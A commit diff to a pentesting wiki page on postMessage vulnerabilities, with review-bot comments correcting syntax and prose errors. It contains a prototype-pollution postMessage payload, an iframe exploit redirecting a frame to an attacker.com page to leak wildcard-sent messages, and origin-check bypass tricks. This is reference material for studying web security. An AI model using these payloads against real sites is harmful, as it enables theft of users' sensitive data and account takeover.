GitBook: [master] 2 pages modified
This commit is contained in:
parent
8625431ec6
commit
eb47c749d2
@ -50,7 +50,6 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
**Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.**
**Copyright © Carlos Polop 2020. Except where otherwise specified \(the copied information belongs to the original authors\), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International \(CC BY-NC 4.0\)**](https://creativecommons.org/licenses/by-nc/4.0/)**.
If you want to use it with commercial purposes, please contact with me.**
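Review bot: the bold span opened at the start of the CC BY-NC line (`**Copyright © Carlos Polop 2020. Except where otherwise specified ...`) is only closed at the end of the separate paragraph `If you want to use it with commercial purposes, please contact with me.**`; Markdown bold does not span a blank line, so both paragraphs will render with literal asterisks. Close the span at the end of the first paragraph and open a fresh one on the second, or drop the bold on the second sentence. While touching it, `with commercial purposes` reads better as `for commercial purposes`, and `contact with me` as `contact me`.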
@ -1,40 +1,51 @@
# PostMessage Vulnerabilities
## **PostMessages wildcards**
## Send **PostMessage**
**PostMessage** uses the following function to send a message:
```javascript
```bash
targetWindow.postMessage(message, targetOrigin, [transfer]);
# postMessage to current page
window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an iframe with id "idframe"
document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an URL
window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
```
Check that **targetOrigin** could be a url like _https://company.com_, so the messages can only be sent to that user \(secure\). Or it cloud be a wildcard "**\***". In case a wildcard is used, messages could be sent to any domain.
Note that **targetOrigin** can be a '\*' or an URL like _https://company.com._
In the **second scenario**, the **message can only be sent to that domain** \(even if the origin of the window object is different\).
If the **wildcard** is used, **messages could be sent to any domain**, and will be sent to the origin of the Window object.
### Attack
### Attacking iframe & wilcard in **targetOrigin**
In [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) you can read how you could **iframe a page** that at some point may **sent** a **postmessage** using a **wildcard as targetOrigin** and **modify it's location so the data will be sent to an arbitrary domain**. In order to be able to perform this attack **X-Frame header must not be present** in the vuln page.
As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed** \(no `X-Frame-Header` protection\) and that is **sending sensitive** message via **postMessage** using a **wildcard** \(\*\), you can **modify** the **origin** of the **iframe** and **leak** the **sensitive** message to a domain controlled by you.
Note that if the page can be iframed but the **targetOrigin** is **set to a URL and not to a wildcard**, this **trick won't work**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);
function exp(){
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
<iframe src="https://docs.google.com/document/ID" />
<script>
setTimeout(exp, 6000); //Wait 6s
//Try to change the origin of the iframe each 100ms
function exp(){
setInterval(function(){
window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
}, 100);
}
</script>
</html>
```
## addEventListener exploitation
In order to treat the messages a code similar to the following one will be used:
**`addEventListener`** is the function used by JS to declare the function that is **expecting `postMessages`**.
A code similar to the following one will be used:
```javascript
window.addEventListener("message", (event) => {
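Review bot: in the `Send PostMessage` snippet the payload `'{"__proto__":{"isAdmin":True}}'` uses Python's `True`; JSON and JavaScript spell it `true`, so a receiver that does `JSON.parse(event.data)` will throw instead of parsing the message. The same block is opened with two fences (```javascript and ```bash) and closed once, and its comments use `#`, which is not a JavaScript comment; keep a single ```javascript fence and write the comments with `//`. In the iframe example, `<iframe src="https://docs.google.com/document/ID" />` is not self-closing in HTML: the parser ignores the trailing slash and treats everything up to `</iframe>` (here, the rest of the file) as the iframe's text content, so the following `<script>` never executes; write `<iframe src="..."></iframe>`. Inside that script, `window.frames[0].frame[0][2].location` reads `frame`, which is not a window property; `frames` is presumably intended. Prose: `it cloud be a wildcard` → `it could be a wildcard`, `wilcard` → `wildcard`, `may sent a postmessage` → `may send a postMessage`, `modify it's location` → `modify its location`, and `X-Frame header` should name the actual header, `X-Frame-Options`.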
@ -45,24 +56,15 @@ window.addEventListener("message", (event) => {
}, false);
```
Note in this case how the first thing that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints and change the victims passwords \(in this example\).
Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords \(in this example\).
It's important to check the origin and it's **equally important to check it right:**
### Tips/Bypasses in PostMessage vulnerabilities
### addEventListener check origin bypasses
Copied from [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)
* If `indexOf()` is used to check the origin of the PostMessage event, remember that it can be bypassed if the origin is contained in the string as seen in [_The Bypass_](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html#bypass)
* [@filedescriptor](https://twitter.com/filedescriptor): Using `search()` to validate the origin could be insecure. According to the docs of `String.prototype.search()`, the method takes a regular repression object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp.
```javascript
"https://www.safedomain.com".search(t.origin)
```
In regular expression, a dot \(.\) is treated as a wildcard. In other words, any character of the origin can be replaced with a dot. An attacker can take advantage of it and use a special domain instead of the official one to bypass the validation, such as **www.s.afedomain.com**.
* [@bored-engineer](https://bored.engineer/): If `escapeHtml` function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
* If **`indexOf()`** is used to **check** the **origin** of the PostMessage event, remember that it can be easily bypassed like in the following example: `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")`
* If **`search()`** is used to **validate** the **origin** could be insecure. According to the docs of `String.prototype.search()`, the method **takes a regular repression** object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp. In regular expression, **a dot \(.\) is treated as a wildcard**. An attacker can take advantage of it and **use** a **special domain** instead of the official one to bypass the validation, like in: `"https://www.safedomain.com".search("www.s.fedomain.com")`.
* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
```javascript
// Expected to fail:
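Review bot: the `search()` bypass paragraph gives two different attacker domains and only one of them actually matches. The string `"www.s.fedomain.com"`, converted to a regular expression, matches `"https://www.safedomain.com"` because the `.` after `s` consumes the `a`, so `search()` returns 8; the variant `"www.s.afedomain.com"` needs a literal `a` right after that wildcard position, which is where `f` sits, so `search()` returns -1 and the check would not be bypassed. Use the `www.s.fedomain.com` form in both the prose and the inline example. `regular repression` appears twice and should read `regular expression`. Grammar in the origin-check paragraph: `send arbitrary data to this endpoints` → `to this endpoint`, and `change the victims passwords` → `change the victims' passwords`. The hunk ends inside the `escapeHtml` code fence at `// Expected to fail:`; the rest of that block is not in this diff view, so the fence should be checked for its closing marker in the full file.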